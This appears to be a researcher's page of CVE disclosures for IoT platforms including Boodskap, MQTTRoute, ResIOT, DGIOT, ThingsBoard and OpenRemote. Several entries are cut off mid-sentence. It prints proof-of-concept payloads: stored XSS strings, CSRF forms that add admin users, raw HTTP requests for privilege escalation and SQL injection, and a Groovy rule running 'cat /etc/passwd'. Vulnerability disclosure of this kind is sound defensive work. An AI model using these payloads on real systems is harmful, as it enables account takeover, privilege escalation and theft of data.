CVE Disclosures

Konker Platform is an Open Source Platform for the Internet of Things (IoT).  The platform v2.3.9 and below are vulnerable to cross-site request forgery attacks. CSRF protection is disabled: http.csrf().disable() URL: https://github.com/KonkerLabs/konker-platform/blob/007a3eebb45a0d29581abd84322b799bc4c542d1/konker.registry.data.core/src/main/java/com/konkerlabs/platform/registry/data/core/config/SecurityConfig.java#L87 References:  https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html

CVE-2022-35136:  Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests. CVE-2022-35135:  Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges  via a crafted request sent to /api/user/upsert/<uuid>.  The platform successfully processes API requests even without valid cookies.For example, the following request to update user profile is processed, even though the request does not have any cookie/api key. (Cookie header is blank in the request) Since API requests to the platform are not authenticated, a user can assign themselves an admin role, by sending a request to  http://192.168.72.157/api/user/upsert/<userid>  endpoint. HTTP Request: POST /api/user/upsert/8c34fa03- 706a-4dc7-b484-cd8e0c329c81 HTTP/1.1 Host: 192.168.72.157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Re

  Boodskap  IoT Platform v4.4.9-02 contains a cross-site scripting (XSS)  vulnerability. The application does not enforce input validation and output sanitization in multiple functionalities.  Example 1: domain name can be set to <script>alert(1)</script> Example 2: A lower privilege user can change their name to include a XSS payload, and target the admin user References: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

A cross-site scripting (XSS) vulnerability in MQTTRoute v3.3 and below  allows attackers to execute arbitrary web scripts or HTML via a crafted  payload injected into the dashboard name text field. It is possible to submit JavaScript in form fields as shown below. The submitted JavaScript is stored and included in the application without output encoding, leading to cross-site scripting attack. As shown below, it is possible for an adversary to steal admin session cookie via cross-site scripting.  References: https://cheatsheetseries. owasp.org/cheatsheets/Cross_ Site_Scripting_Prevention_ Cheat_Sheet.html

A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows  attackers to create and remove dashboards.  The HTTP requests issued by the application do not have anti-csrf tokens. As a result, an attacker can craft a malicious form, which when submitted by an unsuspecting user in a valid session, would make the server assume that the request has been sent willingly by the user. Sample PoC form to create a dashboard: <html>   <body>   <script>history.pushState('', '', '/')</script>     <form action=" http://localhost:8080/ bwiot/api/v1/dashboard/ " method="POST">       <input type="hidden" name="name" value="SC&lt;img&#32;src&#61;& #35;&#32;onerror&#61;alert&# 40;document&#46;cookie&#41;& gt;" />       <input type="hidden" name="desc" value="ADV" />       <input type="submit" value

SQL injection vulnerability in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via a crafted POST request to /ResiotQueryDBActive. An admin user can execute arbitrary SQL commands and can even dump DB content. Since this endpoint is vulnerable to CSRF, an attacker can abuse CSRF in conjunction with this to execute arbitrary SQL queries on the DB. HTTP Request: POST /ResiotQueryDBActive/ HTTP/1.1 Host:  172.20.32.1:8088 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form- urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 159 Origin:  http://172.20.32.1:8088 Connection: close Referer:  http://172.20.32.1:8088/Login/ Cookie: isMobile=false; login=1; pw= 4617e3d2c7ca44273258ee9c706806 b6 query= <SQL_QUERY_HERE> The following information was retrieved from a SQLMap scan on my local installatio

Multiple Cross Site Scripting (XSS) vulnerabilities in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via the form fields. Upon entering text such as "<script>alert(1)</script>" in form fields, the application stores them and renders them as JavaScript code instead of text. E.g., XSS in Node Name (test<img src=# onerror=alert(1)>) References: https://www.resiot.io/en/changelog/  (Patched Version: 4.1.1000118, Release Date: 31/08/2022) https:// cheatsheetseries.owasp.org/ cheatsheets/Cross_Site_ Scripting_Prevention_Cheat_ Sheet.html

Cross Site Request Forgery (CSRF) vulnerability in ResIOT ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 allows attackers to add new admin users to the platform or other unspecified impacts. ResIOT® IOT Platform + LoRaWAN Network Server (on-premise version) V.4.1.1000114  does not use any CSRF protection mechanism. It is possible for an attacker to launch CSRF attacks against users of the platform. An attacker can abuse CSRF to perform actions, such as creating a user on the platform. For this, the attacker can prepare a HTML form such as follows, host it online and send the form's link to a ResIoT admin user. <html>   <body>   <script>history.pushState('', '', '/')</script>     <form action=" http://172.20.32.1: 8088/UserorgApi/?domain=172. 20.32.1&protocol=http:&email= test111@gmail.com&firstname= test&lastname=one&password= V79NrFNCAxZNXtg&phone= 77777777777 " method="POST

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. The platform does not output encode JS payloads such as <script>alert(document.cookie)</script>. These are instances of stored XSS that can be abused to steal admin user cookies. References: https://owasp.org/www-community/attacks/xss/

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs. Patch details:  https://github.com/thingsboard/thingsboard/pull/7385 Audit logs help in establishing accountability of usage among various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of Thingsboard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower privileged user of the platform. According to Thingsboard's documentation ( https://thingsboard.io/docs/pe/user-guide/rbac/ ), on the community edition, "a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant". Each tenant has several customers and as

An issue was discovered in OpenRemote through 1.0.4 allows attackers to execute arbitrary code via a crafted Groovy rule. Post disclosure, OpenRemote has restricted the affected functionality to specific user role (super users - https://github.com/openremote/openremote/pull/725), to potentially reduce risks regarding unrestricted Groovy rules.  Details: The OpenRemote Platform has a functionality wherein users can create rules in 3 ways, namely, When-Then, Flow and Groovy.  Users can create rules by writing custom code in Groovy programming language. It is possible for a user of the platform to create a Groovy rule that executes arbitrary commands on the server hosting the OpenRemote platform. In the following PoC, we are trying to execute the "cat /etc/passwd" command on the hosting server and log the output of the command. Proof of Concept: def sout = new StringBuilder(), serr = new StringBuilder() def proc = 'cat /etc/passwd'.execute() proc.consumeProcessOutput(sou